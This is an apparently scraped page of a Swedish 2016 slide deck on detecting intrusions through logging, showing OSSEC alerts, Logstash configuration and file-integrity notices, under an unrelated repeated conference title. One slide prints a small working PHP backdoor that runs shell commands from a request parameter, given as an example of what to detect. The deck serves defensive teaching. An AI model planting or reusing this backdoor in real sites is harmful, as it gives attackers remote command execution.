APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 

Upptäcka intrång med hjälp av loggning

  • 1. Intrång upptäckt av loggning CoreSec 2016-05-19
  • 3.
  • 4. OSSEC HIDS Notification.2013 Jun 16 23:48:29 Received From: hetzner->/var/www/logs/error.log Rule: 31421 fired (level 5) -> "PHP internal error (missing file or function).” Portion of the log(s):2013/06/16 23:48:27 [error] 2252#0: *9980497 FastCGI sent in stderr: "PHP message: PHP Fatal error: Call to undefined function includ_once() in /var/www/docs/wp-content/themes/mytheme/footer.php on line 1" while reading upstream, client: 5.9.164.69, server: hetzner, request: "GET /wp-content/themes/mytheme/images/favicon.ico HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"
  • 5. OSSEC HIDS Notification.2013 Jun 16 23:48:29 Received From: hetzner->/var/www/logs/error.log Rule: 31421 fired (level 5) -> "PHP internal error (missing file or function).” Portion of the log(s):2013/06/16 23:48:27 [error] 2252#0: *9980497 FastCGI sent in stderr: "PHP message: PHP Fatal error: Call to undefined function includ_once() in /var/www/docs/wp-content/themes/mytheme/footer.php on line 1" while reading upstream, client: 5.9.164.69, server: hetzner, request: "GET /wp-content/themes/mytheme/images/favicon.ico HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"
  • 6.
  • 7. +
  • 8. output { if [type] == "syslog" { file { message_format => "%{[message]}" path => "/ebs/syslog/logstash/%{[host]}.syslog" } }}
  • 9. find /ebs/syslog/logstash/ -type f -exec ./util.sh addfile {} syslog ;
  • 10.
  • 11.
  • 12.
  • 14.
  • 15. https://gist.github.com/jonaslejon <?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?> Exempel på bakdörr
  • 16. Filintegritet OSSEC HIDS Notification. 2015 Jul 16 00:41:30 Received From: ds5090->syscheck Rule: 554 fired (level 7) -> "File added to the /var/www directory." Portion of the log(s): New file '/var/www/website.com/docs/president.php' added to the file system. --END OF NOTIFICATION
  • 17. Tack!